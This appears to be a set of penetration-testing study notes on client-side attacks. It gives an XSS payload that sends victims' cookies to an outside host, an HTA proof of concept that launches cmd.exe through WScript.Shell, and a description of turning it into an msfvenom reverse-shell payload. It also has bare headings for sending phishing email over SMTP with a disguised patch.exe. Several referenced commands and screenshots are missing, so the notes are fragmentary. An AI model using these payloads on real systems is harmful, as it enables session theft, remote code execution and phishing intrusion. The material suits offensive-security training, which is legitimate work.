Client-Side Attacks

Cross-Site Scripting XSS

A useful payload to catch users cookie

<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>

HTA Exploit

In this example, we will utilize ActiveXObjects, which can potentially allow access to underlying operating system commands, making it a dangerous technique. This can be achieved through the Windows Script Host functionality, specifically using the Windows Script Host Shell object or WScript.

Once the Windows Script Host Shell object is instantiated, we can use its run method to launch an application on the client machine we're targeting. However, when mshta.exe is executed, it keeps an additional window open behind the command prompt. To avoid this, we can modify our proof-of-concept by using the .close(); object method, as shown below:

<html>
<head>
<script>
  var c= 'cmd.exe'
  new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>
  self.close();
</script>
</body>
</html>

We can save this code in a file (poc.hta) on our Kali machine and host it on the Apache web server. When a victim opens this file with Internet Explorer, they will be presented with a pop-up dialog as shown below:

The pop-up dialog is generated when the system attempts to execute an .hta file. If the user selects "Open," an additional dialog will appear:

The second dialog box appears because Internet Explorer's sandbox protection, also known as Protected Mode, is enabled by default. If the victim selects "Allow," the action is permitted, and the JavaScript code is executed, launching cmd.exe as shown below:

To convert our basic HTML Application into an attack, we will utilize msfvenom, which supports the hta-psh output format to generate an HTA payload that relies on PowerShell:

If everything goes as expected, we should be able to capture a reverse shell.b

Phishing email 25 SMTP

Interact with SMTP server to send a phishing email:

msfvenom payload used to generate the patch.exe: